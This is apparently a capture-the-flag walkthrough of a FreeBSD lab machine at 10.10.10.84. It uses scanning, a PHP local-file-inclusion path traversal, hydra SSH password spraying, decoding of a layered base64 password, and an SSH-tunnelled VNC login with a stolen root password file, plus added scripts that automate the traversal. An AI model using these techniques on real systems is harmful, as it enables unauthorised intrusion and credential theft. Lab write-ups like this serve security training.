Target IP: 10.10.10.84
Initial nmap scan of all TCP ports at a high packet rate; the pipeline keeps only the port numbers so they can be pasted straight into the next scan:
sudo nmap -p- --min-rate 10000 10.10.10.84 | grep '^[0-9]' | cut -d'/' -f1 | tr '\n' ','
We have the following ports open: 22 and 80.
Let's run a more in-depth scan of these ports (default scripts plus version detection), saving the output in all formats:
sudo nmap -sCV -p22,80 10.10.10.84 -oA nmap_results
Results:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2 (FreeBSD 20161230; protocol 2.0)
| ssh-hostkey:
| 2048 e3:3b:7d:3c:8f:4b:8c:f9:cd:7f:d2:3a:ce:2d:ff:bb (RSA)
| 256 4c:e8:c6:02:bd:fc:83:ff:c9:80:01:54:7d:22:81:72 (ECDSA)
|_ 256 0b:8f:d5:71:85:90:13:85:61:8b:eb:34:13:5f:94:3b (ED25519)
80/tcp open http Apache httpd 2.4.29 ((FreeBSD) PHP/5.6.32)
|_http-server-header: Apache/2.4.29 (FreeBSD) PHP/5.6.32
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
Service Info: OS: FreeBSD; CPE: cpe:/o:freebsd:freebsd
From what we can see:
we are dealing with a FreeBSD machine
we have a web server running Apache 2.4.29 with PHP 5.6.32 (both old releases; PHP 5.6 has been end-of-life since the end of 2018)
Okay, let's start at the web server.
HTTP port 80
It looks like some kind of application where we can run local PHP scripts on the target machine by asking the page for them by name.
Let's start directory busting in the background and enumerate this further:
feroxbuster -u http://10.10.10.84 -t 50 -L 5 -n -w /usr/share/seclists/SecLists-master/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -x php -o dirs.txt
Not much luck with our directory busting.
Playing around with the application, we can view info.php,
which gives us the exact version of FreeBSD running on the target:
FreeBSD Poison 11.1-RELEASE FreeBSD 11.1-RELEASE
Notice that the URL passes a filename to the application: if that value is handed to include() or similar without being restricted to the web root, we have a potential LFI (local file inclusion).
Let's catch the request with Burp and test this further.
Catch the request and send it over to Repeater.
If we look at where the application is including files from,
it means we need to go up 5 directories (../../../../../) to reach the filesystem root, so the payload for /etc/passwd becomes ../../../../../etc/passwd.
We have the contents of the passwd file.
Let's gather some usernames from it (entries with a real login shell rather than nologin).
These seem to be the only possible user accounts other than root.
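The two steps above (finding how many ../ are needed, then pulling candidate accounts out of the returned passwd file) can be automated. The script below is an added example and is not part of the original writeup; the vulnerable page name (browse.php) and its parameter (file) are assumptions, since the screenshot that names them is not in the text, and the passwd content it runs against offline is constructed, not the target's real file. The probe stops at the smallest depth that works, which is what a real include does: extra ../ past the filesystem root are simply ignored, so anything deeper would also succeed.

```python
#!/usr/bin/env python3
"""Probe an LFI parameter for the number of ../ needed to reach /etc/passwd,
then list the accounts worth password-spraying from the file it returns.

Added example, not the writeup's own code. VULN_PATH and VULN_PARAM are
assumptions; SAMPLE_PASSWD is constructed sample data.
"""
import re
import urllib.parse
import urllib.request

TARGET = "http://10.10.10.84"  # from the scan above
VULN_PATH = "/browse.php"      # ASSUMPTION: the page that includes the file
VULN_PARAM = "file"            # ASSUMPTION: its query parameter

# Shells that cannot be used for an interactive SSH login.
NOLOGIN_SHELLS = {"/usr/sbin/nologin", "/sbin/nologin", "/bin/false",
                  "/usr/bin/false", "/nonexistent", ""}


def traversal_url(depth, target="etc/passwd"):
    """Build the request URL with `depth` copies of ../ in front of the target."""
    payload = "../" * depth + target
    return TARGET + VULN_PATH + "?" + urllib.parse.urlencode({VULN_PARAM: payload})


def http_fetch(url):
    """Live fetch; the offline stand-in below has the same signature."""
    with urllib.request.urlopen(url, timeout=10) as resp:
        return resp.read().decode("utf-8", "replace")


def find_depth(fetch, max_depth=10):
    """Return (depth, body) for the smallest depth whose response looks like passwd."""
    for depth in range(1, max_depth + 1):
        body = fetch(traversal_url(depth))
        if re.search(r"^root:[^:]*:0:0:", body, re.M):
            return depth, body
    return None, None


def login_users(passwd_text):
    """Accounts with a usable shell: root plus ordinary users (uid >= 1000).
    System accounts are skipped even when they carry a shell."""
    users = []
    for line in passwd_text.splitlines():
        fields = line.strip().split(":")
        if len(fields) != 7 or not fields[2].isdigit():
            continue
        name, uid, shell = fields[0], int(fields[2]), fields[6]
        if shell in NOLOGIN_SHELLS:
            continue
        if uid == 0 or uid >= 1000:
            users.append(name)
    return users


# Constructed sample standing in for the real file (FreeBSD-style entries).
SAMPLE_PASSWD = """\
root:*:0:0:Charlie &:/root:/bin/csh
toor:*:0:0:Bourne-again Superuser:/root:
daemon:*:1:1:Owner of many system processes:/root:/usr/sbin/nologin
www:*:80:80:World Wide Web Owner:/nonexistent:/usr/sbin/nologin
nobody:*:65534:65534:Unprivileged user:/nonexistent:/usr/sbin/nologin
charix:*:1001:1001:charix:/home/charix:/bin/csh
"""


def make_mock_fetch(real_depth, passwd_text=SAMPLE_PASSWD):
    """Offline stand-in for http_fetch. Any depth >= real_depth returns the
    file, mirroring how ../ past the filesystem root resolves to / again."""
    def fetch(url):
        query = urllib.parse.parse_qs(urllib.parse.urlparse(url).query)
        payload = query.get(VULN_PARAM, [""])[0]
        if payload.count("../") >= real_depth and payload.endswith("etc/passwd"):
            return passwd_text
        return "<html>Warning: include(): failed to open stream</html>"
    return fetch


if __name__ == "__main__":
    # Swap make_mock_fetch(5) for http_fetch to run against the real target.
    depth, body = find_depth(make_mock_fetch(5))
    print("traversal depth:", depth)
    print("candidate users:", login_users(body))
```

The user list deliberately keeps root: on a box like this, root is as worth spraying as any other account with a shell, and nothing in the passwd file tells you whether SSH permits root logins.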
While we enumerate the LFI, let's begin an SSH password spray with these usernames in the background (-f stops at the first valid pair; expect this to be slow against rockyou):
hydra -f -P /usr/share/wordlists/rockyou.txt -L usernames 10.10.10.84 ssh
When we ask the web application to open the file listfiles.php,
we can see a file named pwdbackup.txt.
Let's see if we can open this file.
When we look at it we can see the following:
I'm assuming they mean they encoded the password 13 times using base64.
Let's decode it:
<base64 string omitted>
We can write a quick bash script that takes the encoded string and the number of times to decode it:
#!/bin/bash
# Usage: bash basedecode.sh <base64 string> <number of layers>
# Decode a base64 string the given number of times (the backup note says 13).
base64_string="$1"
num_times="$2"
if [ -z "$base64_string" ] || [ -z "$num_times" ]; then
    echo "usage: $0 <base64 string> <number of layers>" >&2
    exit 1
fi
# Strip one layer per iteration; base64 -d ignores the line wrapping the CLI adds
for ((i=0; i<num_times; i++)); do
    decoded_string=$(echo "$base64_string" | base64 --decode) || {
        echo "layer $((i+1)) is not valid base64, stopping" >&2
        exit 1
    }
    base64_string="$decoded_string"
done
# Print the final decoded string
echo "Final Decoded String: $decoded_string"
When we run the script we can see the following:
bash basedecode.sh <base64 string omitted> 13
We have the password Charix!2#4%6&8(0
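The script above trusts the "13 times" hint. Since the note could just as well mean "at least 13", a more robust approach is to keep peeling while the data is still valid base64 and stop at the first layer that is not, which is exactly what happens at the real password (its !, # and % are outside the base64 alphabet). The Python below is an added example, not the writeup's code; its test input is constructed by re-encoding the recovered password 13 times the way `echo ... | base64` would.

```python
#!/usr/bin/env python3
"""Peel nested base64 layers until the data stops being base64.

Added example, not the writeup's script. Decodes while each layer is valid
base64 that yields printable text, and reports how many layers came off,
so a hint like "encoded at least 13 times" can be checked instead of trusted.
"""
import base64
import binascii
import re
from typing import Optional, Tuple


def _is_text(data: bytes) -> bool:
    """A genuine layer decodes to printable ASCII (more base64, or the password)."""
    return all(32 <= b < 127 or b in b"\r\n\t" for b in data)


def peel_base64(blob: bytes, max_layers: int = 64) -> Tuple[bytes, int]:
    """Return (final_bytes, layers_removed).

    Stops at the first layer that is not valid base64 or that decodes to
    non-printable bytes, leaving the last good layer untouched rather than
    mangling the password with one decode too many."""
    current, layers = blob, 0
    while layers < max_layers:
        compact = re.sub(rb"\s+", b"", current)  # the base64 CLI wraps lines
        try:
            nxt = base64.b64decode(compact, validate=True)
        except binascii.Error:
            break
        if not nxt or not _is_text(nxt):
            break
        current, layers = nxt, layers + 1
    return current, layers


def recover_password(blob: bytes, expected_layers: Optional[int] = None) -> str:
    """Decode fully; if the note promised at least N layers, refuse on fewer."""
    final, layers = peel_base64(blob)
    if expected_layers is not None and layers < expected_layers:
        raise ValueError(f"only {layers} base64 layers found, expected {expected_layers}")
    return final.decode("ascii").strip()


def wrap_base64(secret: bytes, layers: int) -> bytes:
    """Constructed fixture: mimic `echo secret | base64` applied `layers` times."""
    data = secret + b"\n"
    for _ in range(layers):
        data = base64.encodebytes(data)  # inserts newlines like the CLI does
    return data


if __name__ == "__main__":
    # Constructed input; on the box you would read pwdbackup.txt instead.
    blob = wrap_base64(b"Charix!2#4%6&8(0", 13)
    print(recover_password(blob, expected_layers=13))
```

Note the validate=True: without it, Python's decoder silently discards non-alphabet characters, which would turn the final password into garbage instead of stopping the loop.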
Let's stop our hydra attack and specify this password instead, to see if we can gain SSH access to the machine (here passwd is a file containing just the recovered password):
hydra -f -P passwd -L usernames 10.10.10.84 ssh
We can see we have a hit for charix.
Let's SSH into the machine:
ssh charix@10.10.10.84
Priv Esc via charix
Looking through charix's home folder we find a secret.zip file.
It's protected with a password.
Let's download this zip file to our local machine:
scp charix@10.10.10.84:/home/charix/secret.zip ./
Let's try the password we found for charix (password reuse is common, and it works here).
It produces a file named secret.
We use hexdump
to see the file contents:
cat secret | hexdump -c
0000000 275 250   [   |  325 226   z   !
0000008
The file is exactly 8 bytes long and mostly non-printable (hexdump -c shows the non-printable bytes in octal), so it is not text; keep that size in mind for later.
Let's confirm the version of FreeBSD we are on (uname -a or freebsd-version).
Given the name of the machine and the version, we can search for possible exploits using searchsploit:
searchsploit freebsd poison
We find one interesting result.
Possible vector; we will look into it later.
Let's see if there are any ports open internally on the target (e.g. sockstat -4l or netstat -an on FreeBSD).
We can see the following two ports listening on the loopback address only: 5801 and 5901,
which are related to VNC (remote desktop access) and are not reachable from outside the box.
Worth investigating further.
Let's see if there are any processes running related to VNC (ps aux | grep -i vnc).
This is interesting. Let's explain what is happening; the Xvnc process is running with the following arguments:
-desktop X -httpd /usr/local/share/tightvnc/classes -auth /root/.Xauthority -geometry 1280x800 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5901
Desktop name: -desktop X
HTTP classes location (the Java viewer applet served on 5801): -httpd /usr/local/share/tightvnc/classes
X authentication data file (root's, so the server runs as root): -auth /root/.Xauthority
Screen geometry: -geometry 1280x800
VNC server wait time: -rfbwait 120000 (120,000 milliseconds)
VNC authentication password file: -rfbauth /root/.vnc/passwd
VNC server port: -rfbport 5901 (the default port for display :1, i.e. 5900 plus the display number)
With this information
it makes sense for the 8-byte binary file secret
to be the authentication we need for VNC: a VNC password file of the kind -rfbauth points at is exactly 8 bytes, the password obfuscated with DES under a fixed, publicly known key rather than hashed, which is why a copy of it is as good as the password itself and why vncviewer can consume it directly.
Since the port only listens on localhost, we can tunnel our connection to VNC using SSH.
We can then authenticate to port 5901 and hopefully gain access to the remote desktop X.
Okay, let's do it.
Let's create a port forward using SSH
between our local machine and the target:
ssh -L 9001:127.0.0.1:5901 charix@10.10.10.84
-L : forwards a port on our local machine, over the SSH session, to an address and port as seen from the target
9001: the first port we specify is our local listening port
127.0.0.1:5901: the loopback address and the VNC port as seen from the target (which is why the localhost-only bind does not stop us)
Now we can use vncviewer,
passing the secret file we found earlier as the password file, and connect to the remote desktop through the tunnel (the double colon tells vncviewer that 9001 is a TCP port rather than a display number):
vncviewer -passwd secret 127.0.0.1::9001
We now have access to root's X desktop
as the root user, since the Xvnc server was started by root with root's .Xauthority.